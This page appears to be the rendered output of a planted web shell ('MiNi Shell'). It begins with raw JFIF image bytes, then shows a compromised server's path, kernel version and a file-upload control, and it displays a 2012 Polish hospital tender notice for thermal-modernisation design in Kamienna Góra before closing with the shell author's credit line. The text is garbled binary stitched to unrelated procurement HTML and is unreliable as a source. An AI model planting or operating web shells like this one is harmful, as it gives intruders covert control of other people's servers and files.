JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120425/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120425/94161-N-2012.html

<p class="kh_header"><b>Kamienna Góra: na opracowanie  dokumentacji projektowej na   termomodernizację budynku Powiatowego Centrum Zdrowia  w  Kamiennej Górze na potrzeby  Powiatowego Centrum Zdrowia   w Kamiennej Górze Sp z o. o. NZOZ Szpital Powiatowy</b><br>
<b>Numer ogłoszenia: 94161 - 2012; data zamieszczenia: 25.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Zdrowia w Kamiennej Górze Sp. z o.o. Niepubliczny Zakład Opieki Zdrowotnej Szpital Powiatowy , ul. Bohaterów Getta 10, 58-400 Kamienna Góra, woj. dolnośląskie, tel. 075 7449033.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcz.org.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Niepubliczny Zakład Opieki Zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> na opracowanie  dokumentacji projektowej na   termomodernizację budynku Powiatowego Centrum Zdrowia  w  Kamiennej Górze na potrzeby  Powiatowego Centrum Zdrowia   w Kamiennej Górze Sp z o. o. NZOZ Szpital Powiatowy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Powiatowe  Centrum Zdrowia w Kamiennej Górze  Sp z o. o.  Niepubliczny Zakład Opieki Zdrowotnej Szpital Powiatowy  zaprasza  do udziału w postępowaniu prowadzonym w trybie przetargu nieograniczonego nr 8 - 2012  na opracowanie  dokumentacji projektowej   na  termomodernizację  budynku Powiatowego Centrum Zdrowia  w  Kamiennej Górze  Sp z o. o. na potrzeby  Powiatowego Centrum Zdrowia   w Kamiennej Górze Sp z o. o. NZOZ Szpital Powiatowy.   
CPV: 71.22.00.00-6; 71.22.30.00-7; 71.30.00.00-1   
  
          Przedmiotem zamówienia jest opracowanie dokumentacji projektowej  termomodernizacji budynku Powiatowego Centrum Zdrowia  w  Kamiennej Górze Sp z o. o. NZOZ Szpital Powiatowy na potrzeby   Powiatowego Centrum Zdrowia   w Kamiennej Gorze, który winien uwzględniać remont i docieplenie elewacji, dachu bez wymiany stolarki okiennej.  
        
Wykonanie dokumentacji winno przebiegać dwuetapowo: 
I    etap       -  Wykonawca winien sporządzić  audyt energetyczny
II   etap       -  sporządzenie dokumentacji projektowej dla proponowanego rozwiązania (docieplenia) w celu  wykazania  efektu termomodernizacyjnego 
    
     Przedmiotem zamówienia jest zaprojektowanie: 

-   docieplenia i remontu  elewacji budynku o powierzchni  6 296,4 0m2,

-   ocieplenie i remontu  stropodachu o powierzchni 1 901,70 m2 oraz wykonanie obróbek blacharskich,

-   docieplenie i remontu  stropu oddziału dziecięcego o powierzchni  450 m2, bez wymiany stolarki okiennej i drzwiowej,

 -   zaprojektowanie instalacji ciepłej wody.

     Stolarka okienna i drzwiowa starego typu została wymieniona  i zapewnia obecnie obowiązujące współczynniki oraz poprawia szczelność istniejących otworów. 

       W wyniku przeprowadzonego remontu dachu oraz elewacji ulegną parametry termiczne i wygląd budynku. 

Projekt winien być opracowany tak aby:

dostosować obiekt do wymogów określonych w obowiązujących przepisach prawa, w szczególności rozporządzenia    Ministra Zdrowia z dnia 10 listopada 2006 roku w sprawie wymagań jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej (Dz. U. Nr 213 poz. 1568),
rozporządzenia Ministra Infrastruktury  z dn. 12 kwietnia 2002r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. Nr 75, poz. 690 z późn. zmn),   rozporządzeniem Ministra Infrastruktury  z dn. 12 kwietnia 2002r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. Nr 75, poz. 690 z późn. zmn), wymianę wyeksploatowanych nośników energii  na bardziej ekonomiczne i ekologiczne, uzyskać korzystniejszy bilans cieplny budynku, jak najmniejszy współczynnik przenikania ciepła, obniżyć  koszty eksploatacji infrastruktury. 

     Głównym celem  prac remontowych prowadzonych na zewnętrznej części budynku będzie uzyskanie korzystniejszego bilansu cieplnego.  Obecnie ściany zewnętrzne i dach budynku mają bardzo wysoki  współczynnik przenikania ciepła na poziomie  1,6 - 1,79 W/ m2K. Zamawiający poprawił szczelność poprzez wymianę stolarki  budowlanej w 2009r na okna dwuszynowe z PCV o współczynniku przenikalności ciepła wynoszącym U =1,1-1,6.
  
  W ramach modernizacji  przewiduje się docieplenie ścian zewnętrznych łącznie ze szpaletami na obiekcie. W roku 2006r.  Zamawiający wymienił grzejniki  żeliwne  członowe    na grzejniki płytowe  marki Purmo  C i Higiena wraz z armaturą przygrzejnikową - zawory termostatyczne RTD - N i odcinające powrotne z możliwością spustu wody instalacyjnej). 

Szpital jest zlokalizowany  w miejscowości Kamienna Góra przy ul. Bohaterów Getta 10. 

Nazwa  Beneficjanta:   POWIATOWE CENTRUM ZDROWIA W KAMIENNEJ GÓRZE  Sp. z o. o.
Niepubliczny Zakład Opieki Zdrowotnej Szpital Powiatowy 
 
Jednostka realizująca:  POWIATOWE CENTRUM ZDROWIA W KAMIENNEJ GÓRZE  Sp. z o. o.
Niepubliczny Zakład Opieki Zdrowotnej Szpital Powiatowy 
 wydział prowadzący: dział  zamówień publicznych 

status prawny Beneficjenta:  spółka prawa handlowego, własność samorządu powiatowego, osoba prawna 

Adres jednostki: 58-400 Kamienna Góra, ul. Bohaterów Getta 10, woj. dolnośląskie 


        Jednostką odpowiedzialną za wdrażanie przedsięwzięcia jest Powiatowe Centrum Zdrowia w Kamiennej Górze Sp z o. o. NZOZ Szpital Powiatowy.  Obsługę finansową  projektu sprawować będzie wydział księgowości a osobą odpowiedzialna za prawidłowość jest główny księgowy. Przygotowaniem dokumentów przetargowych i postępowania  przetargowego zajmą się pracownicy  szpitala.  Dla potrzeb realizacji zamówienia i wyboru wykonawców  zostaną opracowane  odrębne dokumenty przetargowe: na wybór wykonawcy,  inżynierów oraz audytorów oraz rysunki  techniczne. 
        Zamawiający informuje, iż rysunki techniczne oraz opis dołączone do SIWZ są  wyłącznie do wglądu przez wykonawcę. Ponieważ prawa autorskie nie zostały przeniesione  na Zamawiającego do Zamawiający zastrzega, że w przypadku  gdyby Wykonawca  chciał  wykorzystać do projektowania sprawę praw autorskich należy załatwić we własnym zakresie (WW PROJEKT Kamienna Góra tel 075/744-66-24  Piotr Wyrostek).
         Rozwiązania techniczne, jak i materiały budowlane  opisane w załączniku należy dostosować do obecnych standardów  stosowanych w budownictwie. Kolorystyka winna być uzgodniona z Zamawiającym i dostosowana do obecnego bloku operacyjnego. 
          Przewidziano długookresowe utrzymanie i finansowanie projektu.  W  przedmiocie zamówienia dokonano charakterystyki  Szpitala Powiatowego w Kamiennej Górze. Opis ten należy tutaj rozszerzyć o elementy związane z etapem eksploatacji.   Integralnym załącznikiem do SIWZ  jest opis  stanu obecnego zał nr k do SIWZ.

           Zamawiający zwraca uwagę, że kolorystyka  elewacji szpitala  jest przykładowa  i winna być dostosowana do nowo wybudowanego bloku operacyjnego 
         
           Projekt winien przewidywać nakłady inwestycyjne  na środki trwałe niezbędne do prawidłowej eksploatacji projektu i całego przedsięwzięcia.

           Przedmiot zamówienia obejmuje w szczególności:
     

1)  projekt budowlany - 8 egz. w formie papierowej, 1 egz. w wersji elektronicznej (format PDF, lub format*.doc);

2) projekt wykonawczy - 5 egz. w formie papierowej, 1 egz. w formie elektronicznej (format PDF lub format*.doc);

3) specyfikację techniczną wykonania i odbioru robót objętych projektem budowlanym - 2 egz. w formie papierowej oraz 1 egz. w formie elektronicznej (format PDF lub format*.doc);

4) kosztorys inwestorski wraz z przedmiarem robót - 2 egz. w formie papierowej oraz 1 egz. w wersji   elektronicznej (format PDF lub format*.doc).

2. Sporządzenie  dokumentacji wchodzącej w skład opracowania zgodnie z:
1)    ustawą z dnia 7 lipca 1994 roku Prawo budowlane (t. j. Dz. U. Nr 156, poz. 1118 z 2006 r. ze  zmianami),
2) rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 roku w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. Nr 120, poz. 1133 z późniejszymi zmianami),
3)  rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 roku w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót oraz programu funkcjonalno - użytkowego (Dz. U. Nr 202, poz. 2072),
4)  rozporządzeniem Ministra Infrastruktury z dnia 22 kwietnia  2005 roku  zmieniające rozporządzenie w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót oraz programu funkcjonalno - użytkowego (Dz. U. Nr 75, poz. 2075),
5) rozporządzeniem Ministra Zdrowia z dnia 10 listopada 2006 roku w sprawie wymagań jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej (Dz. U. Nr 213 poz. 1568),
6) rozporządzeniem Ministra Infrastruktury  z dn. 12 kwietnia 2002r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. Nr 75, poz. 690 z późn. zmn),   rozporządzeniem Ministra Infrastruktury  z dn. 12 kwietnia 2002r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. Nr 75, poz. 690 z późn. zmn),
7) rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. Nr 130, poz. 1389),
8) i innych ustaw i rozporządzeń,
9) Polskimi Normami,
10) zasadami wiedzy technicznej i sztuki budowlanej, a także z uwzględnieniem:
-  branżowych warunków technicznych i uzgodnień,
-  wymagań bhp, p. poż, 
-  uzgodnień roboczych z Zamawiającym.
3.  Dokumentacja projektowa powinna wskazywać kolejność wykonywania prac i obszarów realizacyjnych -niezależnych od innych.    
4.   Projekt zostanie opracowany  w oparciu o przepisy i  będzie określał następujące kryteria:
      -      standard wykończenia i wyposażenia w instalacje,
      -      koszty realizacji przyszłego obiektu,
      -      koszty termomodernizacji,
      -      uzyskanie efektu ekologicznego. 
 
5. Opracowanie specyfikacji technicznej wykonania i odbioru prac remontowych będzie określało wymagania  w zakresie sposobu wykonania robót budowlanych, obejmujące w szczególności wymagania co do właściwości materiałów, wymagania dot. sposobu wykonania poszczególnych robót oraz zakresu prac,  które powinny być ujęte w cenach poszczególnych pozycji przedmiaru robót.

6. Opracowanie przedmiarów robót    będzie zawierało opis robót budowlanych w kolejności technologicznej ich wykonania, z podaniem liczby jednostek przedmiarowych robót wynikających z dokumentacji projektowej, oraz podstaw do ustalenia cen   jednostkowych robót lub  nakładów rzeczowych.

7.  Opracowanie kosztorysów inwestorskich  zostanie  wykonane zgodnie  z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia  metod i podstaw  sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U.,  Nr 130, poz. 1389).


O zakończeniu prac projektowych decyduje podpisany przez obie Strony protokół zdawczo - odbiorczy oraz  prawomocna decyzja o pozwoleniu na budowę. 
 
W sprawach nieuregulowanych  niniejszą umową stosuje się odpowiednie przepisy Ustawy z dnia 29 stycznia   2004 roku Prawo zamówień publicznych  (tekst jednolity z 2006r., Nr 164, poz. 1163 z późn. zmn.),   ustawy z dnia 21 listopada 2008r. o wspieraniu termomodernizacji i remontów  (Dz. U. 2008 nr 223 poz. 1459 ze zmn.) oraz odpowiednie przepisy Kodeksu Cywilnego.

Szczegółowe warunki usługi  określa się w umowie zał nr g,  g1..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.22.30.00-7, 71.30.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymaga się wpłaty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują osobami posiadającymi uprawnienia do  projektowania   w zakresie  objętym przedmiotem   zamówienia co najmniej po jednej osobie z uprawnieniami  w specjalności:
- architektonicznej,
- konstrukcyjno  - budowlanej   oraz  będącymi członkiem właściwej terytorialnie Izby Inżynierów Budownictwa i Architektów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania wiedzy i doświadczenia, wyrażające się tym, że jako wykonawca brał udział w opracowaniu co najmniej 1 dokumentacji projektowej obejmującej swoim zakresem rozwiązania termomodernizacyjne (docieplenie ścian, wyprawa elewacyjna, remont dachu, itp.)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuści możliwość dokonywania zmian w treści umowy w stosunku do treści oferty Wykonawcy w  sytuacjach, gdy wystąpi co najmniej jedna z poniżej wymienionych okoliczności:
- wystąpi siła wyższa mająca wpływ na realizację umowy,
- zaistnieje omyłka pisarska lub rachunkowa,
- nieistotne zmiany umowy, 
- zachodzi konieczność zmiany terminu  wykonania przedmiotu zamówienia, w 
  przypadku, gdy nie można było tego przewidzieć w chwili podpisania umowy,
- niezbędna jest zmiana sposobu wykonania zobowiązania, o ile zmiana taka jest 
- korzystna dla Zamawiającego lub jest konieczna w celu prawidłowego wykonania 
  umowy,
- zmiany podatku VAT,
- zachodzi konieczność zmiany w zakresie podwykonawstwa, za uprzednią zgodą Zamawiającego: możliwe jest powierzenie podwykonawcom innego zakresu części zamówienia niż wskazany w ofercie Wykonawcy, a także możliwa jest zmiana podwykonawcy na etapie realizacji zamówienia, o ile nie jest to sprzeczne z postanowieniami SIWZ,
- możliwa jest korzystna dla Zamawiającego zmiana terminu i sposobu płatności za realizację przedmiotu zamówienia,
- nastąpiła zmiana danych Wykonawcy  w tym min. formy organizacyjno - prawnej,
- zmiana rachunku bankowego i innych danych stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcz.org.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> POWIATOWE CENTRUM ZDROWIA W KAMIENNEJ GÓRZE  Sp. z o. o.
Niepubliczny Zakład Opieki Zdrowotnej Szpital Powiatowy 
58-400 Kamienna Góra, ul. Bohaterów Getta 10, woj. dolnośląskie 
dział zam. publ..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2012 godzina 10:00, miejsce: SEKRETARIAT
POWIATOWEGO CENTRUM ZDROWIA W KAMIENNEJ GÓRZE  Sp. z o. o.
Niepubliczny Zakład Opieki Zdrowotnej Szpital Powiatowy 
58-400 Kamienna Góra, ul. Bohaterów Getta 10, woj. dolnośląskie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com